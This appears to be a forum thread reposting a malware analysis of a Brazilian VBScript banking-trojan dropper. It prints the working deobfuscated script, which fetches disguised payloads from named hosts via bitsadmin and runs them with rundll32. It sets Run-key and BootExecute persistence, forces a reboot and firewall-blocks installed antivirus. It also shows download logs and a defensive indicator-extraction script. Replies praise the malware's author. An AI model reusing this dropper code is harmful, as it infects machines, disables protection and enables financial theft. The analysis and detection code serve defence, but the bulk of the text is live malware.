If (MyFileSysObject.FileExists(MyUserName & "\qXfWln92f")) Then
        WScript.Quit
end if

set MyFileAndOSverOK = MyFileSysObject.CreateTextFile(MyUserName & "\qXfWln92f", 2, true)
MyFileAndOSverOK.Close


'....:ARQUIVO RRI:....'
MyMalicious1.Run("cmd /c echo RR>> ""%SYSTEMROOT%\%COMPUTERNAME%_Part."&"r"&"r"&"i"""),0,True

'....:VARIAVEIS:....'
MyMalicious1.Run("cmd /c setx.exe UPLKVARIABLE ""http://brcentermodelo.com.br/arquivos/up.jpg"" /M"),0,True
MyMalicious1.Run("cmd /c setx.exe upvariable %RANDOM% /M"),0,True

'....:AVISAR:....'
MyMalicious1.Run("cmd /c reg query HKLM\SYSTEM\ControlSet001\Services\G"&"b"&"p"&"S"&"v" & _
" &&schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 2, Now()),4) & " /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /TR ""cmd /c schtasks /DELETE /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /F &start ' ' """"http://martinstranns.com.br/contador/cnt.php?url=[Plugin][%COMPUTERNAME%]-cn-"""""" /RU SYSTEM" & _
" ||schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 2, Now()),4) & " /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /TR ""cmd /c schtasks /DELETE /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /F &start ' ' """"http://martinstranns.com.br/contador/cnt.php?url=[N/A][%COMPUTERNAME%]-cn-"""""" /RU SYSTEM"),0,True

'....:UPDATE:....'
MyMalicious1.Run("cmd /c schtasks /CREATE /F /SC ONSTART /DELAY 0009:00 /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}"" " & _
"/TR ""cmd /c bitsadmin /transfer t%RANDOM% /Download /PRIORITY HIGH %UPLKVARIABLE% %SYSTEMROOT%\%upvariable%.tmp" & _
" &rundll32.exe %SYSTEMROOT%\%upvariable%.tmp,#1"" /RU SYSTEM"),0,True

'....:REINI:....'
MyMalicious1.Run("cmd /c schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 14, Now()),4) & _
" /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}3"" /TR ""cmd /c schtasks /DELETE /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}3"" /F &shutdown /r /t 60 /f"" /RU SYSTEM"),0,True
'....:KL:....'
MyMalicious1.Run("cmd /c schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 4, Now()),4) & _
" /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}1"" /TR ""cmd /c bitsadmin /transfer k%RANDOM% /Download /PRIORITY HIGH ""http://brcentermodelo.com.br/arquivos/host.jpg"" ""%SYSTEMROOT%\%COMPUTERNAME%.tmp""" & _
" &schtasks /DELETE /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}1"" /F &echo 10032> ""%SYSTEMROOT%\%upvariable%"""" /RU SYSTEM" & _
" &&reg.exe ADD ""HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" /v %COMPUTERNAME% /t REG_SZ /d ""rundll32 %SYSTEMROOT%\%COMPUTERNAME%.tmp,#1"" /F"),0,True

'....:PART:....'
MyMalicious1.Run("cmd /c reg.exe ADD ""HKLM\SYSTEM\CurrentControlSet\Control\Partizan"" /v HideWelcomeMessage /t REG_DWORD /d 2 /F"),0,True
MyMalicious1.Run("cmd /c schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 3, Now()),4) & _
" /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}2"" /TR ""cmd /c bitsadmin /transfer p%RANDOM% /Download /PRIORITY HIGH ""http://brcentermodelo.com.br/arquivos/part.jpg"" ""%SYSTEMROOT%\%COMPUTERNAME%_Part.exe"" &schtasks /DELETE /F /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}2"""" /RU SYSTEM" & _
" &reg.exe ADD ""HKLM\SYSTEM\CurrentControlSet\Control\Session Manager"" /v BootExecute /t REG_MULTI_SZ /d ""autocheck autochk *\0 \0%SYSTEMROOT%\%COMPUTERNAME%_Part.exe\0"" /F"),0,True

'*********ANTIVITUS*********'
var1()
Function var2(var3)
   For MyCount = Len(var3) To 1 Step -1
      If Mid(var3, MyCount, 1) = "\" Then Exit For
   Next
   var2 = Left (var3, MyCount - 1)
End Function

Sub Myevasion(MyMalicious2)
    For Each MyCount2 in MyMalicious2.SubFolders
        Set MyPath = MyFileSysObject.GetFolder(MyCount2.Path)
        Set MyPayload = MyPath.Files
        for each MyFileData in MyPayload
            if LCase(InStr(1,MyFileData, ".exe")) > 1 then
                                     MyMalicious1.Run("cmd /c netsh advfirewall firewall add rule name=""" & MyFileSysObject.GetFileName(MyFileData) & """ dir=in action=block program=""" & MyFileData & """ enable=yes"),0,True
                                     MyMalicious1.Run("cmd /c echo \??\" & MyFileData & ">> %SYSTEMROOT%\%COMPUTERNAME%_Part"&"."&"r"&"r"&"i"),0,True
                                     MyMalicious1.Run("cmd /c netsh advfirewall firewall add rule name=""" & MyFileSysObject.GetFileName(MyFileData) & """ dir=out action=block program=""" & MyFileData & """ enable=yes"),0,True
                               End If
        Next
        Myevasion MyCount2
    Next
End Sub

Function var1()
        MyProgFile = MyMalicious1.ExpandEnvironmentStrings("%PROGRAMFILES(X86)%")
        MyProgFile2 = MyMalicious1.ExpandEnvironmentStrings("%PROGRAMFILES%")
        Set MySecCenter = GetObject("winmgmts:\\.\root\SecurityCenter2")
        Set MySecCenterSELECT = MySecCenter.ExecQuery("Select * from A" & "n" & "t" & "i" & "V" & "i" & "r" & "u" & "s" & "P" & "r" & "o" & "d" & "u" & "c" & "t")
        For Each MyCount3 in MySecCenterSELECT
          With MyCount3
                MyrealPATH = var2(.pathToSignedProductExe)
                MyrealPATH = Replace(MyrealPATH,"%ProgramFiles(x86)%",MyProgFile)
                MyrealPATH = Replace(MyrealPATH,"%ProgramFiles%",MyProgFile2)
                set MyPath = MyFileSysObject.GetFolder(MyrealPATH)
               
                set MyPayload = MyPath.Files
               
                For Each MyrealPAYLOAD in MyPayload
                        MyrealPAYLOADNAME = MyrealPAYLOAD.Name
                        If MyFileSysObject.GetExtensionName(MyrealPAYLOADNAME) = "exe" Then
                                MyMalicious1.Run("cmd /c netsh adv" & "f" & "i" & "r" & "e" & "w" & "a" & "l" & "l firewall add rule name=""" & MyrealPAYLOAD.Name & """ dir=in action=block program=""" & MyrealPATH & "\" & MyrealPAYLOAD.Name & """ enable=yes"),0,True
                                MyMalicious1.Run("cmd /c echo \??\" & MyrealPATH & "\" & MyrealPAYLOAD.Name & ">> %SYSTEMROOT%\%COMPUTERNAME%_Par"&"t"&"."&"r"&"r"&"i"),0,True
                                MyMalicious1.Run("cmd /c netsh a" & "d" & "v" & "f" & "i" & "r" & "e" & "w" & "a" & "l" & "l f" & "i" & "r" & "e" & "w" & "a" & "l" & "l add rule name=""" & MyrealPAYLOAD.Name & """ dir=out action=block program=""" & MyrealPATH & "\" & MyrealPAYLOAD.Name & """ enable=yes"),0,True
                        End If
                Next
                Myevasion MyFileSysObject.GetFolder(MyrealPATH)
          End With
        Next
    MyNoError = DTSTaskExecResult_Success
End Function


// alive PoC:

Resolving brcentermodelo.com.br (brcentermodelo.com.br)... 52.8.51.135
Connecting to brcentermodelo.com.br (brcentermodelo.com.br)|52.8.51.135|:80... connected.
HTTP/1.0 GET /arquivos/up.jpg request sent, awaiting response... 200 OK
Length: 45568 (44K) [image/jpeg]
Saving to: './sample'
./sample     100%[=====>]  44.50K   213KB/s   in 0.2s
2015-08-13 16:15:17 (213 KB/s) - './sample' saved [45568/45568]

Resolving martinstranns.com.br (martinstranns.com.br)... 52.8.140.254
Connecting to martinstranns.com.br (martinstranns.com.br)|52.8.140.254|:80... connected.
HTTP request sent, awaiting response... 403 Forbidden
2015-08-13 16:29:14 ERROR 403: Forbidden.

// VT samples:
virustotal.com/en/file/8538c78539832eaf25550bdf0ab1a9f9f004459af0208cf4d047aa41dfb6f260/analysis/1439451647/ ... https://www.virustotal.com/en/file/2fba569d0875dea7724285d61f792e28a67a2707772beb33749e4be5931ec82c/analysis/1439451661/ ... https://www.virustotal.com/en/file/1c14e870a9420d9c18b6caf8f44964ec07fa87f14b896fce50c043a8cb9b5439/analysis/ ... https://www.virustotal.com/en/file/ce96958d91aa1e900f7c73d0ffe35feffee8678e5adfd240f7fbf160f262a1b7/analysis/1439451732/ ...


#--
#MalwareMustDie!!

HELLO!!!

For the naive ones who believe that VBS malware ended with Melissa and ILOVEYOU

THANKS FOR READING!!!
"Some believe I am a bot; they may be right"
"Since one cannot equal God, I have already decided what to do: SURPASS HIM!"
"The worst ignorance is not knowing how to correct it"

*Shadow Scouts Team*
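Since the deobfuscated script above spells out every artefact the dropper leaves behind, a defender can turn it straight into indicators and host checks. The following Python is an added example written for this thread; it is not MalwareMustDie's code nor part of the original post. It assumes the deobfuscated script text is available as input; the embedded excerpt is a shortened copy of the `cmd` strings quoted above, with the computed task start times replaced by fixed values. It pulls the URLs, hosts, scheduled-task names and registry keys out of the script, and then checks the two persistence artefacts the script plants: the `Run` value that launches `rundll32` on a renamed `.tmp`, and the `BootExecute` REG_MULTI_SZ that gains an entry besides the stock `autocheck autochk *`. The same two checks apply to a live host's registry export, not only to this sample.

```python
"""Extract indicators from the deobfuscated BANLOAD dropper and check the
persistence artefacts it writes (Run key and BootExecute)."""
import re

# Constructed excerpt: shortened copies of the cmd strings from the deobfuscated
# script quoted above; task start times replaced by fixed values. No new IoCs.
SAMPLE_SCRIPT = r'''
MyMalicious1.Run("cmd /c setx.exe UPLKVARIABLE ""http://brcentermodelo.com.br/arquivos/up.jpg"" /M"),0,True
MyMalicious1.Run("cmd /c schtasks /CREATE /F /SC ONCE /ST 10:00 /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /TR ""cmd /c start ' ' """"http://martinstranns.com.br/contador/cnt.php?url=[Plugin][%COMPUTERNAME%]-cn-"""""" /RU SYSTEM"),0,True
MyMalicious1.Run("cmd /c schtasks /CREATE /F /SC ONSTART /DELAY 0009:00 /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}"" /TR ""cmd /c bitsadmin /transfer t1 /Download /PRIORITY HIGH %UPLKVARIABLE% %SYSTEMROOT%\%upvariable%.tmp &rundll32.exe %SYSTEMROOT%\%upvariable%.tmp,#1"" /RU SYSTEM"),0,True
MyMalicious1.Run("cmd /c reg.exe ADD ""HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" /v %COMPUTERNAME% /t REG_SZ /d ""rundll32 %SYSTEMROOT%\%COMPUTERNAME%.tmp,#1"" /F"),0,True
MyMalicious1.Run("cmd /c reg.exe ADD ""HKLM\SYSTEM\CurrentControlSet\Control\Session Manager"" /v BootExecute /t REG_MULTI_SZ /d ""autocheck autochk *\0 \0%SYSTEMROOT%\%COMPUTERNAME%_Part.exe\0"" /F"),0,True
'''

URL_RE = re.compile(r'https?://[^\s"\'()<>]+')
HOST_RE = re.compile(r'https?://([^/\s"\']+)')
# schtasks names used by the dropper: a GUID, optionally followed by one digit
TASK_RE = re.compile(r'\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}\d?')
REGKEY_RE = re.compile(r'HK(?:LM|CU|CR|U)\\[^"\n]+')
# reg.exe ADD ... /v BootExecute /t REG_MULTI_SZ /d ""<entries>""
BOOTEXEC_RE = re.compile(r'/v BootExecute .*?/d ""([^"]+)""')
# reg.exe ADD ""...\CurrentVersion\Run"" /v <name> /t REG_SZ /d ""<command>""
RUNKEY_RE = re.compile(r'CurrentVersion\\Run"" /v (\S+) /t REG_SZ /d ""([^"]+)""')

STOCK_BOOTEXECUTE = "autocheck autochk *"


def _unique(items):
    """Deduplicate while keeping first-seen order."""
    return list(dict.fromkeys(items))


def extract_iocs(script_text):
    """Network and host indicators that can go straight into blocklists / hunts."""
    return {
        "urls": _unique(URL_RE.findall(script_text)),
        "hosts": _unique(HOST_RE.findall(script_text)),
        "tasks": _unique(TASK_RE.findall(script_text)),
        "regkeys": _unique(REGKEY_RE.findall(script_text)),
    }


def bootexecute_values(script_text):
    """Entries the script writes to BootExecute; reg.exe separates them with a literal backslash-0."""
    match = BOOTEXEC_RE.search(script_text)
    return match.group(1).split("\\0") if match else []


def bootexecute_extra_entries(values):
    """Anything besides the stock autochk line runs as a native process before logon."""
    return [v for v in values if v.strip() and v.strip() != STOCK_BOOTEXECUTE]


def run_key_entries(script_text):
    """(value name, command) pairs added under HKLM\\...\\CurrentVersion\\Run."""
    return RUNKEY_RE.findall(script_text)


def run_value_suspicious(command):
    """rundll32 loading a module that is not a .dll (here a renamed .tmp) is the tell."""
    tokens = command.split()
    for i, tok in enumerate(tokens):
        if tok.lower() in ("rundll32", "rundll32.exe") and i + 1 < len(tokens):
            module = tokens[i + 1].split(",")[0]
            return not module.lower().endswith(".dll")
    return False


if __name__ == "__main__":
    for kind, items in extract_iocs(SAMPLE_SCRIPT).items():
        print(kind, items)
    print("BootExecute extras:", bootexecute_extra_entries(bootexecute_values(SAMPLE_SCRIPT)))
    for name, cmd in run_key_entries(SAMPLE_SCRIPT):
        print("Run value", name, "suspicious:", run_value_suspicious(cmd))
```

The BootExecute check is the one worth keeping around: on a clean machine that value holds only `autocheck autochk *`, so any extra entry (such as the `%COMPUTERNAME%_Part.exe` this dropper adds) is a finding regardless of the malware family.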

Interesting! Very good work by the developer; VBS is and will continue to be a very powerful language, even if it is a scripting language.
8)
The art of creating malware is something only a few understand!


August 30, 2017, 06:40:39 AM #3 Last edited: August 30, 2017, 03:25:18 PM by xyz
The author goes to the trouble of developing a tool and shares it with the community altruistically; you should show respect and not ask for what you can do yourself, as the rule says:

Quote: [2] We don't do homework; if you have a question, make it specific and don't ask for the complete code.

In Brazil it's scary to have a credit card hahah, scams everywhere, skimmers; I'd rather keep everything under the mattress.